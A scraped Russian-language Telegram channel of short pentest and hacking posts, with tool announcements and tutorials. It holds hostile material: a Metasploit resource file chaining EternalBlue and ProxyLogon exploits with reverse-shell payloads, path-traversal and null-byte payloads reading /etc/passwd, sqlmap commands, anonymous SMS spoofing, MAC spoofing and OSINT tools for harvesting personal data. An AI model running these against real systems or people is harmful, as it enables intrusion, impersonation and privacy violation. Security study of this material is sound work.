Практически план, направленный на , подготовку специалиста в сфере информационной безопасности, основанный на различных задачах, таких как тестирование на проникновение, обеспечение безопасности приложений, облачная безопасность, DevSecOps и многое другое.
План включает широкий спектр бесплатных и платных ресурсов, инструментов и материалов.
https://github.com/jassics/security-study-plan
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22❤14🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
🧑💻 PLOW
Plow инструмент, который предназначен для нагрузочного тестирования HTTP-серверов.
Он основан на Go-библиотеке fasthttp, которая до десяти раз быстрее стандартной реализации, что делает его каким‑то аномально быстрым.
Plow может отдавать статистику в реальном времени не только в окне терминала, но и в браузере (по стандарту встроенный сервер доступен на 18888-м порте).
Запуск возможен из Docker или установкой из исходников:
Альтернатива:
Аргументы в целом ничего необычного собой не представляют: тут у нас стандартная для таких программ настройка количества потоков (-c), желаемого количества запросов (-n), времени теста (-d 30s или -d 5m, например) и HTTP-метода (--method="GET"). Про другие параметры можно подробно прочитать в справке программы (--help). Цель передается без специальных параметров.
▪ Github
@linuxkalii
Plow инструмент, который предназначен для нагрузочного тестирования HTTP-серверов.
Он основан на Go-библиотеке fasthttp, которая до десяти раз быстрее стандартной реализации, что делает его каким‑то аномально быстрым.
Plow может отдавать статистику в реальном времени не только в окне терминала, но и в браузере (по стандарту встроенный сервер доступен на 18888-м порте).
Запуск возможен из Docker или установкой из исходников:
go install github.com/six-ddc/plow@latest
plow <args>
Альтернатива:
docker run --rm --net=host ghcr.io/six-ddc/plow <args>Аргументы в целом ничего необычного собой не представляют: тут у нас стандартная для таких программ настройка количества потоков (-c), желаемого количества запросов (-n), времени теста (-d 30s или -d 5m, например) и HTTP-метода (--method="GET"). Про другие параметры можно подробно прочитать в справке программы (--help). Цель передается без специальных параметров.
▪ Github
@linuxkalii
👍22❤9🔥3
Через что?
Fake-SMS - это небольшой скрипт, работающий через сервис textbelt.com, позволяющий отправлять бесплатные и анонимные сообщения из терминала операционной системы Kali Linux.
▪Возможности Fake-SMS:
▪ Скачиваем и установливаем Fake-SMS на Kali Linux
• Для скачивания и установки Fake-SMS, используйте команду:
sudo git clone https://github.com/machine1337/fake-sms• После загрузки, перейти в каталог:
cd fake-sms
• Изменить права на выполнение:
sudo chmod 755 run.sh▪ Использование Fake-SMS для создания отправки СМС
• Для запуска Fake-SMS, выполните скрипт:
sudo ./run.sh• Чтобы отправить SMS-сообщение, просто введите цифру 2 (Send Fake SMS).
• Если открыть скрипт Fake-SMS в текстовом редакторе и прокрутить вниз до строки 119-120, мы увидим команду curl для сервиса textbelt.com.
▪Использование команды curl для отправки бесплатного SMS
• Открыть аккаунт на сайте textbelt.com. После чего можно будет отправлять одно бесплатное анонимное sms-сообщение в день или купить кредиты и получить ключ API.
• Теперь можно отправлять смс без скрипта Fake-SMS, напрямую, с помощью команды curl в Linux (если у вас есть API, вы можете использовать другие инструменты, но curl прекрасно справляется с задачей).
Синтаксис команды:
curl -X POST https://textbelt.com/text --data-urlencode phone='номер-телефона-с-кодом-страны'• —data-urlencode=сообщение=’текстовое сообщение’
• -d key=ключ api
Теперь можно создать команду для отправки смс-сообщения, добавив ключ API.
После отправки смс, появится информации о количестве оставшихся кредов (купленных сообщений).
Было полезно?
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍49❤12🔥5👎1
Полезный инструмент OSINT для извлечения информации из любой учетной записи Google.
Пример:
$ pip3 install ghuntimport httpx
import trio
import sys
from ghunt.helpers.gmail import is_email_registered
async def main():
if not sys.argv[1:]:
exit("Please give an email address.")
as_client = httpx.AsyncClient() # Async Client
email = sys.argv[1]
is_registered = await is_email_registered(as_client, email)
print("Registered on Google :", is_registered)
trio.run(main) # running our async code in a non-async code
▪ Github
▪Онлайн-версия
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18👍7🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
🗃Slips v1.0.6
• Slips - система, написанная на Python, для предотвращения вторжений (IDS/IPS), использующая машинное обучение для обнаружения вредоносного поведения в сетевом трафике.
▪ Github
@linuxkalii
• Slips - система, написанная на Python, для предотвращения вторжений (IDS/IPS), использующая машинное обучение для обнаружения вредоносного поведения в сетевом трафике.
git clone https://github.com/stratosphereips/StratosphereLinuxIPS.git
cd StratosphereLinuxIPS/
docker build --no-cache -t slips -f docker/ubuntu-image/Dockerfile .
docker run -it --rm --net=host --name slips slips
./slips.py -c config/slips.conf -f dataset/test3-mixed.binetflow
▪ Github
@linuxkalii
👍19❤12🔥6👏1
🐙 OpenSquat
OpenSquat — это полезный инструмент с открытым исходным кодом, который выявляет угрозы киберсквоттинга для компаний или доменов.
OpenSquat поддерживает такие функции, как автоматическое обновление домена, обнаружение фишингового домена, подсчет схожести слов, интеграцию с другими службами, такими как VirusTotal, Quad9 DNS и еще много полезных функций.
Пример использования:
▪Github
▪Docs
@linuxkalii
OpenSquat — это полезный инструмент с открытым исходным кодом, который выявляет угрозы киберсквоттинга для компаний или доменов.
OpenSquat поддерживает такие функции, как автоматическое обновление домена, обнаружение фишингового домена, подсчет схожести слов, интеграцию с другими службами, такими как VirusTotal, Quad9 DNS и еще много полезных функций.
git clone https://github.com/atenreiro/opensquat
pip install -r requirements.txtПример использования:
# Lazy run with default options
python opensquat.py
# for all the options
python opensquat.py -h
# Search for generic terms used in phishing campaigns (can lead to false-positives)
python opensquat.py -k generic.txt
# With DNS validation (quad9)
python opensquat.py --dns
# Subdomain search
python opensquat.py --subdomains
# Check for domains with open ports 80/443
python opensquat.py --portcheck
# With Phishing validation (Phishing Database)
python opensquat.py --phishing phish_results.txt
# Save output as JSON
python opensquat.py -o example.json -t json
# Save output as CSV
python opensquat.py -o example.csv -t csv
# Conduct a certificate transparency (ct) hunt
python opensquat.py --ct
# Period search - registrations from the last month (default: day)
python opensquat.py -p month
# Tweak confidence level. The lower values bring more false positives
# (0: very high, 1: high (default), 2: medium, 3: low, 4: very low
python opensquat.py -c 2
# All validations options
python opensquat.py --phishing phishing_domains.txt --dns --ct --subdomains --portcheck ▪Github
▪Docs
@linuxkalii
❤12👍11🔥4
Полезные материалы по тестированию веб-приложений на различные
уязвимости. Все гайды разбиты на категории, в зависимости от типа атак и уязвимостей.• History;
• Web and Server Technology;
• Setting up the lab with BurpSuite and bWAPP;
• Mapping the application and attack surface;
• Understanding and exploiting OWASP top 10 vulnerabilities;
• Session management testing;
• Bypassing client-side controls;
• Attacking authentication/login;
• Attacking access controls (IDOR, Priv esc, hidden files and directories);
• Attacking Input validations (All injections, XSS and mics);
• Business logic vulnerability.
• Generating and testing error codes;
• Weak cryptography testing;
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22❤10🔥7
Kali Linux - идеальное решение для продвинутых тестов на проникновение, позволяющее обойти проверку MAC-адреса и использовать открытую аутентификацию.
• MAC-адрес связан с сетевым адаптером или устройством с сетевыми возможностями и может быть назван физическим адресом. Первые три пары цифр в MAC-адресе представляют уникальный идентификатор организации, а последние три пары - серийный номер устройства.
• MAC-адрес используется для идентификации пользователя в сети, как в проводных, так и в беспроводных сетях. Он также может быть использован для идентификации хакера или сетевого тестера, пытающегося получить несанкционированный доступ к сети.
Для обеспечения анонимности в сети тестер может изменить MAC-адрес атакующей системы с помощью команды ifconfig:
Чтобы вручную изменить IP-адрес, используйте следующие команды:
Выполните следующие действия:
1. Отключите беспроводной интерфейс перед изменением MAC-адреса.
2. Используйте автоматизированный инструмент macchanger для замены выражений xx другими шестнадцатеричными парами.
3. В окне терминала выполните соответствующую команду:
Чтобы изменить существующий MAC-адрес, на совершенно случайный MAC, используйте следующую команду:
Вы увидите инструмент macchanger.
• Некоторые злоумышленники используют автоматизированные сценарии для частой смены своих MAC-адресов при тестировании анонимности. Большие академические группы, такие как колледжи и университеты, используют фильтрацию MAC-адресов для контроля доступа к беспроводным ресурсам.
Однако этот тип фильтрации не обеспечивает полной защиты, так как информация о MAC-адресе передается в открытом виде.
Шифрование является следующим уровнем защиты беспроводной сети.
В следующих постах, мы рассмотрим более сложные примеры.
▪Описание macchanger
@linuxkalii
• MAC-адрес связан с сетевым адаптером или устройством с сетевыми возможностями и может быть назван физическим адресом. Первые три пары цифр в MAC-адресе представляют уникальный идентификатор организации, а последние три пары - серийный номер устройства.
• MAC-адрес используется для идентификации пользователя в сети, как в проводных, так и в беспроводных сетях. Он также может быть использован для идентификации хакера или сетевого тестера, пытающегося получить несанкционированный доступ к сети.
Для обеспечения анонимности в сети тестер может изменить MAC-адрес атакующей системы с помощью команды ifconfig:
sudo ifconfig wlan0 down
sudo ifconfig wlan0 | grep HWЧтобы вручную изменить IP-адрес, используйте следующие команды:
sudo ifconfig wlan0 hw ether 38:33:15:xx:xx:xx
sudo ifconfig wlan0 upВыполните следующие действия:
1. Отключите беспроводной интерфейс перед изменением MAC-адреса.
2. Используйте автоматизированный инструмент macchanger для замены выражений xx другими шестнадцатеричными парами.
3. В окне терминала выполните соответствующую команду:
sudo macchanger wlan0 –eЧтобы изменить существующий MAC-адрес, на совершенно случайный MAC, используйте следующую команду:
sudo macchanger wlan0 –rВы увидите инструмент macchanger.
• Некоторые злоумышленники используют автоматизированные сценарии для частой смены своих MAC-адресов при тестировании анонимности. Большие академические группы, такие как колледжи и университеты, используют фильтрацию MAC-адресов для контроля доступа к беспроводным ресурсам.
Однако этот тип фильтрации не обеспечивает полной защиты, так как информация о MAC-адресе передается в открытом виде.
Шифрование является следующим уровнем защиты беспроводной сети.
В следующих постах, мы рассмотрим более сложные примеры.
▪Описание macchanger
@linuxkalii
👍22❤12🔥5
Наиболее распространенной и используемой уязвимостью на веб-сайтах является SQL-инъекция.
• Одним из самых полезных и мощных инструментов для оценки уязвимостей SQL-инъекций является sqlmap. Инструмент написан на Python, который автоматизирует разведку и эксплуатацию Firebird, Microsoft SQL, MySQL (теперь называется MariaDB, разработанный сообществом и коммерчески поддерживаемый форк MySQL), Базы данных Oracle, PostgreSQL, Sybase и SAP MaxDB.
Мы продемонстрируем атаку SQL-инъекцией на базу данных Mutillidae.
1) Определить веб-сервер, внутреннюю систему управления базами данных и доступные базы данных.
2) Получите доступ к веб-сайту Mutillidae и просмотрите веб-страницы, чтобы определить те, которые принимают пользовательский ввод (например, форма входа пользователя, которая принимает имя пользователя и пароль от удаленного пользователя); эти страницы могут быть уязвимы для SQL-инъекций.
3) Затем откройте Kali и из терминала введите следующее (используя соответствующий целевой IP-адрес):
root@kali:~# sqlmap -u 'http://targetip/mutillidae/index.php?page=user- info.php&username=admin&password=&user-info-php-submitbutton=sqlmap вернет данные, как показано на *рисунке 1.
• Наиболее вероятной базой данных для хранения данных приложения, является БД Mutillidae; поэтому мы проверим все таблицы этой базы данных, используя следующую команду:
root@kali:~# sqlmap -u "http://yourip/mutillidae/index.php?page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" -D mutillidae --tablesДанные, возвращаемые при выполнении этой команды, показаны на *рисунке 2.
📌Читать далее
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11🔥10👍8
git clone https://github.com/Alb-310/Geogramint.git
cd Geogramint/
pip3 install -r requirements.txt
python3 geogramint.py # for GUI mode
python3 geogramint.py --help # for CLI mode
▪Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤4👍4👎1
This media is not supported in your browser
VIEW IN TELEGRAM
🧰X-OSINT: инструмент OSINT “все в одном”.
X-OSINT представляет собой систему разведки с открытым исходным кодом (OSINT), служащую ценным инструментом для сбора точной информации о телефонных номерах и адресах электронной почты пользователей.
Требования и процесс установки
🟢 Python 3
🟢 модуль pip
🟢 Стабильное подключение к Интернету
🟢 Различные пакеты python (будут установлены автоматически в процессе установки)
Процесс установки
1) Клонирование репозитория инструментов выполняется следующим образом
2) После клонирования репозитория перейдите в только что клонированный каталог и измените права доступа, предоставив полный доступ к инструменту.
3) После этого приступайте к запуску скрипта.
4) После выполнения скрипта он предложит выбрать один из двух терминалов для установки различных других пакетов. (Для данного примера выбран Linux)
▪Продолжение
▪Github
@linuxkalii
X-OSINT представляет собой систему разведки с открытым исходным кодом (OSINT), служащую ценным инструментом для сбора точной информации о телефонных номерах и адресах электронной почты пользователей.
Требования и процесс установки
Процесс установки
1) Клонирование репозитория инструментов выполняется следующим образом
git clone https://github.com/TermuxHackz/X-osint/tree/master2) После клонирования репозитория перейдите в только что клонированный каталог и измените права доступа, предоставив полный доступ к инструменту.
3) После этого приступайте к запуску скрипта.
cd X-osint
chmod +x *
bash setup.sh
4) После выполнения скрипта он предложит выбрать один из двух терминалов для установки различных других пакетов. (Для данного примера выбран Linux)
▪Продолжение
▪Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍6🔥5👎3
Эксплуатация нескольких целей с использованием файлов ресурсов MSF
Файлы ресурсов MSF представляют собой текстовые файлы, разделенные строками, которые содержат последовательность команд, которые необходимо выполнить в msfconsole.
• Давайте продолжим и создадим файл ресурсов, который может использовать одну и ту же уязвимость на нескольких хостах:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost xx.xx.xx.xx
set lhost xx.xx.xx.xx
set lport 4444
exploit -j
use exploit/windows/http/exchange_proxylogon_rce
set payload windows/meterpreter/reverse_https
set rhost xx.xx.xx.xx
set lhost xx.xx.xx.xx
set lport 443
exploit –j
• Сохраните файл как multiexploit.rc.
• Теперь вы готовы вызвать файл ресурсов, запустив msfconsole -r filename.rc, где -r указывает на файл ресурсов.
• Предыдущий файл ресурсов будет последовательно использовать одну и ту же уязвимость.
• После завершения первого эксплойта спецификация exploit -j переместит запущенный эксплойт в фоновый режим, позволяя продолжить работу следующего эксплойта.
• Как только эксплуатация всех целей будет завершена, мы сможем увидеть несколько Meterpreter-оболочек, доступных в Metasploit.
Если эксплойт предназначен для запуска только на одном хосте, может быть невозможно ввести несколько хостов или диапазонов IP-адресов в эксплойте. Однако альтернативой является запуск того же эксплойта с разными номерами портов на каждом хосте.
Мы будем обсуждать уже существующие файлы ресурсов MSF, которые можно использовать при повышении привилегий, более подробно см. следующий раздел.
📌Читать
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤4🔥3🤔3
Веб-приложение полного стека, объединяющее множество инструментов и сервисов для аналитиков безопасности в единый инструмент.
▪Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍6🔥3
Лучший способ получать свежие обновлении и следить за трендами в разработке.
Python: t.me/pythonl
C#: t.me/csharp_ci
C/C++/ t.me/cpluspluc
Машинное обучение: t.me/ai_machinelearning_big_data
Data Science: t.me/data_analysis_ml
Devops: t.me/devOPSitsec
Go: t.me/Golang_google
Базы данных: t.me/sqlhub
Rust: t.me/rust_code
Javascript: t.me/javascriptv
React: t.me/react_tg
PHP: t.me/phpshka
Android: t.me/android_its
Мобильная разработка: t.me/mobdevelop
Linux: t.me/+A8jY79rcyKJlYWY6
Big Data: t.me/bigdatai
Хакинг: t.me/linux_read
Java: t.me/javatg
Папка Go разработчика: t.me/addlist/MUtJEeJSxeY2YTFi
Папка Python разработчика: t.me/addlist/eEPya-HF6mkxMGIy
🇬🇧Английский: t.me/english_forprogrammers
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍2🔥2
🗡Методы атак на SaaS
Коллекция методов атак на SaaS-системы.
Software-as-a-Service (сокращенно SaaS — «ПО как услуга») — это программное обеспечение, приобретая которое, пользователь оплачивает не стоимость продукта, а период использования. Самый известный пример SaaS — Netflix: вы покупаете подписку и смотрите фильмы
Предназначен для исследователей безопасности, "красных/синих" команд и специалистов по тестированию на проникновение с целью ознакомления и обмена информацией о методах атак на SaaS.
#infosec #pentesting #redteam
▪ GIthub
@linuxkalii
Коллекция методов атак на SaaS-системы.
Software-as-a-Service (сокращенно SaaS — «ПО как услуга») — это программное обеспечение, приобретая которое, пользователь оплачивает не стоимость продукта, а период использования. Самый известный пример SaaS — Netflix: вы покупаете подписку и смотрите фильмы
Предназначен для исследователей безопасности, "красных/синих" команд и специалистов по тестированию на проникновение с целью ознакомления и обмена информацией о методах атак на SaaS.
#infosec #pentesting #redteam
▪ GIthub
@linuxkalii
👍10❤3🔥2
🚀 Local File Inclusion
LFI - это возможность использования и выполнения локальных файлов на серверной стороне. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.
Проще говоря, это уязвимость открытия файлов с сервера + недостаточная фильтрация, что позволяет открывать произвольный файл.
Поиск
Вначале разберемся как определить параметры которые отвечают за инклуд файлов.
Поиск параметров
Для поиска параметров есть два варианта: автоматический или ручной поиск.
Автоматический поиск
Автоматический поиск можно осуществить тем же spider'ом в burpsuite. Вы можете у нас в вики найти статью burpsuite.
Ручной поиск
Предположим, что мы нашли GET параметр:
http://site.ru/folder/index.php?file=gallery
Подставим под параметр строку 'index':
http://site.ru/folder/index.php?file=index
Если у вас открылся какой то из файлов
Именно такие параметры нам и нужны.
Определение фильтров
После того, как мы получили список параметров, нужно проверить, есть ли у них фильтрация.
Нулевая фильтрация
Попробуем подкачать файлы, которые не рассчитывали показывать.
Аналогом такого файла в Linux является файл
(В данном случае за строку с параметром мы взяли http://site.ru/folder/index.php?file=index.html)
Попробуем его подкачать:
http://site.ru/folder/index.php?file=/../../../../../../etc/passwd
Объясняю что происходит - переход в папку /../ означает поднятие по иерархии вверх (точнее это уязвимость path traversal). Т.к. папка
Если файл показался. То считайте, что вы нашли LFI. В этом случае фильтр вообще отсутствует.
Нулевой байт
В данном случае за строку с параметром мы взяли http://site.ru/folder/index.php?file=index, то есть с отсутствующим окончанием.
Но даже при отсутствии фильтра могут быть проблемы. Например в конце параметра может приписываться окончание.
Например с запросом /../../../../../../etc/passwd может преобразоваться в
/../../../../../../etc/passwd.php
Но и на этот раз есть вариант исправить строку.В старых версиях PHP остался такой недостаток, как Null Byte Injection.
Один из них - это приписывание нулевого байта. Параметры, при передаче по http, зашифровываются в url шифрование. И в этой кодировке нулевой байт выглядит именно в %00.
А т.к. в PHP и многих других языках чтение строки идет именно до нулевого байта, то мы можем приписать его в середину строки, чтобы следующая часть строки отбрасывалась.
В данном случае если мы впишем в параметр /../../../../../../etc/passwd.php%00, то получим следующую строку:
http://site.ru/folder/index.php?file=/../../../../../../etc/passwd%00
И строка в памяти сервера будет выглядеть как:
/../../../../../../etc/passwd%00.php ==> /../../../../../../etc/passwd
И в итоге мы смогли отбросить окончание и получить нужный файл.
String limit
Еще один вариант отбрасывания окончания возможен при String Limit - укорачиванию строки.
И какая же от этого польза? А что если мы отбросим часть строки с окончанием, то получится нужная нам строка,но уже без окончания.
🍀LFI FINDER
@linuxkalii
LFI - это возможность использования и выполнения локальных файлов на серверной стороне. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.
Проще говоря, это уязвимость открытия файлов с сервера + недостаточная фильтрация, что позволяет открывать произвольный файл.
Поиск
file inclusionВначале разберемся как определить параметры которые отвечают за инклуд файлов.
Поиск параметров
Для поиска параметров есть два варианта: автоматический или ручной поиск.
Автоматический поиск
Автоматический поиск можно осуществить тем же spider'ом в burpsuite. Вы можете у нас в вики найти статью burpsuite.
Ручной поиск
Предположим, что мы нашли GET параметр:
http://site.ru/folder/index.php?file=gallery
Подставим под параметр строку 'index':
http://site.ru/folder/index.php?file=index
Если у вас открылся какой то из файлов
index.(любое расширение), находящихся на сайте, то тут мы уже однозначно можем утверждать, что файл отвечает за подкачку файла.Именно такие параметры нам и нужны.
Определение фильтров
После того, как мы получили список параметров, нужно проверить, есть ли у них фильтрация.
Нулевая фильтрация
Попробуем подкачать файлы, которые не рассчитывали показывать.
Аналогом такого файла в Linux является файл
/etc/passwd
(В данном случае за строку с параметром мы взяли http://site.ru/folder/index.php?file=index.html)
Попробуем его подкачать:
http://site.ru/folder/index.php?file=/../../../../../../etc/passwd
Объясняю что происходит - переход в папку /../ означает поднятие по иерархии вверх (точнее это уязвимость path traversal). Т.к. папка
etc лежит в корневой папке, то мы должны ее достичь угадыванием: то есть чем чаще мы поднимаемся вверх, тем выше шанс, что мы окажемся в корневой папке (то мы должны написать несколько раз /../).Если файл показался. То считайте, что вы нашли LFI. В этом случае фильтр вообще отсутствует.
Нулевой байт
В данном случае за строку с параметром мы взяли http://site.ru/folder/index.php?file=index, то есть с отсутствующим окончанием.
Но даже при отсутствии фильтра могут быть проблемы. Например в конце параметра может приписываться окончание.
Например с запросом /../../../../../../etc/passwd может преобразоваться в
/../../../../../../etc/passwd.php
Но и на этот раз есть вариант исправить строку.В старых версиях PHP остался такой недостаток, как Null Byte Injection.
Один из них - это приписывание нулевого байта. Параметры, при передаче по http, зашифровываются в url шифрование. И в этой кодировке нулевой байт выглядит именно в %00.
А т.к. в PHP и многих других языках чтение строки идет именно до нулевого байта, то мы можем приписать его в середину строки, чтобы следующая часть строки отбрасывалась.
В данном случае если мы впишем в параметр /../../../../../../etc/passwd.php%00, то получим следующую строку:
http://site.ru/folder/index.php?file=/../../../../../../etc/passwd%00
И строка в памяти сервера будет выглядеть как:
/../../../../../../etc/passwd%00.php ==> /../../../../../../etc/passwd
И в итоге мы смогли отбросить окончание и получить нужный файл.
String limit
Еще один вариант отбрасывания окончания возможен при String Limit - укорачиванию строки.
И какая же от этого польза? А что если мы отбросим часть строки с окончанием, то получится нужная нам строка,но уже без окончания.
🍀LFI FINDER
@linuxkalii
👍19❤3🔥2🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 Uscrapper: Веб-парсер OSINT
Uscrapper 2.0 – это надежный OSINT-парсер, предназначенный для эффективного сбора разнообразной персональной информации с веб-сайтов.
Uscrapper использует методы веб-парсинга и регулярные выражения для извлечения адресов электронной почты, ссылок на социальные сети, имен авторов, геолокации, номеров телефонов и имен пользователей из гиперссылочных и негиперссылочных источников на веб-странице, поддерживает многопоточность для ускорения этого процесса.
Uscrapper 2.0 оснащен передовыми модулями обхода анти-парсинга и поддерживает технологии для извлечения информации из всех ссылок в пределах одного домена. Кроме того, в программе предусмотрена возможность создания отчета, содержащего все извлеченные данные.
Требования:
• Python 3
• модуль pip
• Стабильное подключение к Интернету
Процесс установки
• Клонируйте репозиторий инструмента следующим образом
• После клонирования перейдите в только что загруженный каталог и измените режим работы “install.sh”, чтобы предоставить полный доступ к инструменту.
• После этого можно приступать к работе с инструментом.
▪Github
▪ Пример работы
@linuxkalii
Uscrapper 2.0 – это надежный OSINT-парсер, предназначенный для эффективного сбора разнообразной персональной информации с веб-сайтов.
Uscrapper использует методы веб-парсинга и регулярные выражения для извлечения адресов электронной почты, ссылок на социальные сети, имен авторов, геолокации, номеров телефонов и имен пользователей из гиперссылочных и негиперссылочных источников на веб-странице, поддерживает многопоточность для ускорения этого процесса.
Uscrapper 2.0 оснащен передовыми модулями обхода анти-парсинга и поддерживает технологии для извлечения информации из всех ссылок в пределах одного домена. Кроме того, в программе предусмотрена возможность создания отчета, содержащего все извлеченные данные.
Требования:
• Python 3
• модуль pip
• Стабильное подключение к Интернету
Процесс установки
• Клонируйте репозиторий инструмента следующим образом
• После клонирования перейдите в только что загруженный каталог и измените режим работы “install.sh”, чтобы предоставить полный доступ к инструменту.
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems• После этого можно приступать к работе с инструментом.
▪Github
▪ Пример работы
@linuxkalii
🔥18👍8❤5🤬1
This media is not supported in your browser
VIEW IN TELEGRAM
WebPalm - это мощный инструмент командной строки на GO для создания карт веб-сайтов и веб-скреппинга. Благодаря рекурсивному подходу он может создать полное дерево всех веб-страниц и ссылок на них на сайте.
Он также может извлекать данные из тела каждой страницы с помощью регулярных выражений, что делает его идеальным инструментом для веб-скрейпинга и извлечения данных.
▪ Github
@linuxkalii
Он также может извлекать данные из тела каждой страницы с помощью регулярных выражений, что делает его идеальным инструментом для веб-скрейпинга и извлечения данных.
go install github.com/XORbit01/webpalm@latest▪ Github
@linuxkalii
👍18🔥6❤4
Список материалов и ресурсов по безопасности Android, предназначенных для пентестеров и охотников за ошибками.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤2🔥2😢1
🦄 Работа с сканером Unicornscan на Kali Linux
Специалисты ИБ используют различные инструменты сканирования. Один из самых популярных, но довольно медленных — Nmap или Masscan (самый быстрый сканер портов), но он не такой точный. Сегодня мы дополним инструментарий маст-хев сканеров тулзой Unicornscan. Далее покажу, как использовать Unicornscan на Kali Linux.
Использование сканера Unicornscan на Kali Linux
Если вам нужен достаточно быстрый, но в тоже время точный сканер, попробуйте установленный в Kali Linux сканер Unicornscan.
Что такое Unicornscan.
Unicornscan — это асинхронный сканер (в отличие от синхронного Nmap). Поэтому он работает намного быстрее.
Ключевые особенности Unicornscan
Unicornscan — это попытка создать распределенный стек TCP/IP на территории пользователя. Хотя в настоящее время он имеет сотни отдельных функций, основной набор способностей включает в себя:
▪Асинхронное сканирование TCP.
▪Асинхронный захват баннера TCP.
▪Асинхронное сканирование UDP.
▪Активная и пассивная удаленная идентификация ОС, приложений и компонентов путем анализа ответов.
▪Регистрация и фильтрация файлов PCAP.
▪Вывод реляционной базы данных.
▪Поддержка пользовательских модулей.
▪Настраиваемые представления наборов данных.
▪Имеет свой стек TCP/IP, отличительную особенность, отличающую его от других сканеров портов.
Сканирование с помощью Unicornscan
Сканер установлен в полной версии Kali Linux. Если вы используете урезанную версию, вот как его установить:
Сначала мы начнем с простого сканирования. Для выполнения базового сканирования, используйте команду:
Для примера, в качестве жертвы я использую уязвимую машину Metasploitable. На скрине видно, что при простом сканировании перечислены все открытые TCP-порты. Это похоже на сканирование -Ss в NMap.
Для сканирования несколько хостов, используйте команду:
Можно использовать инструмент на сайте, установив интервал 30 пакетов в секунду (параметр
Unicornscan сканирование UDP портов
Полученный результат можно сохранить в файл PCAP, для этого используйте параметр -w добавив имя файла (в моем случае — udpports):
Файл будет сохранен в домашний каталог.
Unicornscan сохраненный файл PCAP
Это основное использование Unicornscan. Для более детального изучения стоит открыть справку:
Теперь вы знаете, как сканировать хост или сайт с помощью Unicornscan на Kali Linux.
@linuxkalii
Специалисты ИБ используют различные инструменты сканирования. Один из самых популярных, но довольно медленных — Nmap или Masscan (самый быстрый сканер портов), но он не такой точный. Сегодня мы дополним инструментарий маст-хев сканеров тулзой Unicornscan. Далее покажу, как использовать Unicornscan на Kali Linux.
Использование сканера Unicornscan на Kali Linux
Если вам нужен достаточно быстрый, но в тоже время точный сканер, попробуйте установленный в Kali Linux сканер Unicornscan.
Что такое Unicornscan.
Unicornscan — это асинхронный сканер (в отличие от синхронного Nmap). Поэтому он работает намного быстрее.
Ключевые особенности Unicornscan
Unicornscan — это попытка создать распределенный стек TCP/IP на территории пользователя. Хотя в настоящее время он имеет сотни отдельных функций, основной набор способностей включает в себя:
▪Асинхронное сканирование TCP.
▪Асинхронный захват баннера TCP.
▪Асинхронное сканирование UDP.
▪Активная и пассивная удаленная идентификация ОС, приложений и компонентов путем анализа ответов.
▪Регистрация и фильтрация файлов PCAP.
▪Вывод реляционной базы данных.
▪Поддержка пользовательских модулей.
▪Настраиваемые представления наборов данных.
▪Имеет свой стек TCP/IP, отличительную особенность, отличающую его от других сканеров портов.
Сканирование с помощью Unicornscan
Сканер установлен в полной версии Kali Linux. Если вы используете урезанную версию, вот как его установить:
sudo apt-get install unicornscanСначала мы начнем с простого сканирования. Для выполнения базового сканирования, используйте команду:
sudo unicornscan 192.168.112.57Для примера, в качестве жертвы я использую уязвимую машину Metasploitable. На скрине видно, что при простом сканировании перечислены все открытые TCP-порты. Это похоже на сканирование -Ss в NMap.
Для сканирования несколько хостов, используйте команду:
sudo unicornscan 192.168.112.57 192.168.102.100Можно использовать инструмент на сайте, установив интервал 30 пакетов в секунду (параметр
-r30) и добавив сканирование TCP (параметр -mT):
sudo unicornscan -r30 -mT adaptercart.com
Для сканирования UDP используйте параметр -mU:sudo unicornscan -r300 -mU 192.168.112.57Unicornscan сканирование UDP портов
Полученный результат можно сохранить в файл PCAP, для этого используйте параметр -w добавив имя файла (в моем случае — udpports):
sudo unicornscan -r300 -mU 192.168.112.57 -w udpports.pcapФайл будет сохранен в домашний каталог.
Unicornscan сохраненный файл PCAP
Это основное использование Unicornscan. Для более детального изучения стоит открыть справку:
sudo unicornscan -hТеперь вы знаете, как сканировать хост или сайт с помощью Unicornscan на Kali Linux.
@linuxkalii
👍18❤3🔥2